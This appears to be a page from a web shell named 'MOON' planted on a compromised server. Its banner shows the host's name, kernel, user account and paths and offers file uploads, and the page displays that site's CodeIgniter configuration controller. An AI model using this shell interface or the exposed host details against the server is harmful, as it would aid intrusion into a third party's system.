MOON
Server: Apache
System: Linux nserver.cafsindia.com 4.18.0-553.104.1.lve.el8.x86_64 #1 SMP Tue Feb 10 20:07:30 UTC 2026 x86_64
User: cafsindia (1002)
PHP: 8.2.30
Disabled: NONE
$ pwd: /home/cafsindia/cpaqua.cafsinfotech.in/application/controllers/
Upload Files
File: /home/cafsindia/cpaqua.cafsinfotech.in/application/controllers/Config.php
<?php if ( ! defined('BASEPATH')) exit('No direct script access allowed');
require_once("Secure_Controller.php");

class Config extends Secure_Controller
{
	public function __construct()
	{
		parent::__construct('config');
	}

	/*
	* This function loads all the licenses starting with the first one being OSPOS one
	*/
	private function _licenses()
	{
		$i = 0;
		$license = array();

		$license[$i]['title'] = 'CAFS ' . $this->config->item('application_version');

		if(file_exists('COPYING'))
		{
			$license[$i]['text'] = $this->xss_clean(file_get_contents('COPYING', NULL, NULL, 0, 2000));
		}
		else
		{
			$license[$i]['text'] = 'COPYING file must be in OSPOS root directory. You are not allowed to use OSPOS application until the distribution copy of COPYING file is present.';
		}

		// read all the files in the dir license
		$dir = new DirectoryIterator('license');

		foreach($dir as $fileinfo)
		{
			// license files must be in couples: .version (name & version) & .license (license text)
			if($fileinfo->isFile() && $fileinfo->getExtension() == 'version')
			{
				++$i;

				$basename = 'license/' . $fileinfo->getBasename('.version');

				$license[$i]['title']  = $this->xss_clean(file_get_contents($basename . '.version', NULL, NULL, 0, 100));

				$license_text_file = $basename . '.license';

				if(file_exists($license_text_file))
				{
					$license[$i]['text'] = $this->xss_clean(file_get_contents($license_text_file , NULL, NULL, 0, 2000));
				}
				else
				{
					$license[$i]['text'] = $license_text_file . ' file is missing';
				}
			}
		}

		return $license;
	}

	public function index()
	{
		
		$data['logo_exists'] = $this->Appconfig->get('company_logo') != '';

		$data = $this->xss_clean($data);

		// load all the license statements, they are already XSS cleaned in the private function
		$data['licenses'] = $this->_licenses();

		$this->load->view("configs/manage", $data);
	}

	public function save_info()
	{
		$upload_success = $this->_handle_logo_upload();
		$upload_data = $this->upload->data();
		$addr = $this->input->post('street') .",". $this->input->post('city') .",". $this->input->post('pincode') .",". $this->input->post('country');
		//echo "khjh";
		//die;

		$batch_save_data = array(
			'company' => $this->input->post('company'),
			'address' => $addr,
			'street'=> $this->input->post('street'),
			'city'=> $this->input->post('city'),
			'state'=> $this->input->post('state'),
			'pincode'=> $this->input->post('pincode'),
			'country'=> $this->input->post('country'),
			'phone' => $this->input->post('phone'),
			'email' => $this->input->post('email'),
			'fax' => $this->input->post('fax'),
			'website' => $this->input->post('website'),
			'gstin' => $this->input->post('gstin'),
			'pan' => $this->input->post('pan'),
		);

		if (!empty($upload_data['orig_name']))
		{
			// XSS file image sanity check
			if ($this->xss_clean($upload_data['raw_name'], TRUE) === TRUE)
			{
				$batch_save_data['company_logo'] = $upload_data['raw_name'] . $upload_data['file_ext'];
			}
		}

		$result = $this->Appconfig->batch_save($batch_save_data);
		$success = $upload_success && $result ? TRUE : FALSE;
		$message = $this->lang->line('config_saved_' . ($success ? '' : 'un') . 'successfully');
		$message = $upload_success ? $message : strip_tags($this->upload->display_errors());

		echo json_encode(array('success' => $success, 'message' => $message));
	}

	public function save_general()
	{
		//echo $this->input->post('config_sale_date'); die;
		$batch_save_data = array(
			'default_tax_1_rate' => parse_decimals($this->input->post('default_tax_1_rate')),
			'default_tax_1_name' => $this->input->post('default_tax_1_name'),
			'default_tax_2_rate' => parse_decimals($this->input->post('default_tax_2_rate')),
			'default_tax_2_name' => $this->input->post('default_tax_2_name'),
			'tax_included' => $this->input->post('tax_included') != NULL,
			'auto_reorder' => $this->input->post('auto_reorder') != NULL,
			'receiving_calculate_average_price' => $this->input->post('receiving_calculate_average_price') != NULL,
			'lines_per_page' => $this->input->post('lines_per_page'),
			'default_sales_discount' => $this->input->post('default_sales_discount'),
			'notify_horizontal_position' => $this->input->post('notify_horizontal_position'),
			'notify_vertical_position' => $this->input->post('notify_vertical_position'),
			'custom1_name' => $this->input->post('custom1_name'),
			'custom2_name' => $this->input->post('custom2_name'),
			'custom3_name' => $this->input->post('custom3_name'),
			'custom4_name' => $this->input->post('custom4_name'),
			'custom5_name' => $this->input->post('custom5_name'),
			'custom6_name' => $this->input->post('custom6_name'),
			'custom7_name' => $this->input->post('custom7_name'),
			'custom8_name' => $this->input->post('custom8_name'),
			'custom9_name' => $this->input->post('custom9_name'),
			'custom10_name' => $this->input->post('custom10_name'),

			'salebyitem'       => $this->input->post('salebyitem'),
			'salebycategories' => $this->input->post('salebycategories'),
			'salebyemployee'   => $this->input->post('salebyemployee'),
			'salebypayments'   => $this->input->post('salebypayments'),
			'salebyreceipt'    => $this->input->post('salebyreceipt'),
			'salebydate'       => $this->input->post('salebydate')
		);

		$result = $this->Appconfig->batch_save($batch_save_data);
		$success = $result ? TRUE : FALSE;

		echo json_encode(array('success' => $success, 'message' => $this->lang->line('config_saved_' . ($success ? '' : 'un') . 'successfully')));
	}
	private function _clear_session_state()
	{
		$this->load->library('sale_lib');
		$this->sale_lib->clear_sale_location();
		$this->sale_lib->clear_all();
		$this->load->library('receiving_lib');
		$this->receiving_lib->clear_stock_source();
		$this->receiving_lib->clear_stock_destination();
		$this->receiving_lib->clear_all();
	}
	public function remove_logo()
	{
		$result = $this->Appconfig->batch_save(array('company_logo' => ''));

		echo json_encode(array('success' => $result));
	}

    private function _handle_logo_upload()
    {
    	$this->load->helper('directory');

    	// load upload library
    	$config = array('upload_path' => './uploads/',
    			'allowed_types' => 'gif|jpg|png',
    			'max_size' => '1024',
    			'max_width' => '800',
    			'max_height' => '680',
    			'file_name' => 'company_logo');
    	$this->load->library('upload', $config);
    	$this->upload->do_upload('company_logo');

    	return strlen($this->upload->display_errors()) == 0 || !strcmp($this->upload->display_errors(), '<p>'.$this->lang->line('upload_no_file_selected').'</p>');
    }
}
?>
@ Telegram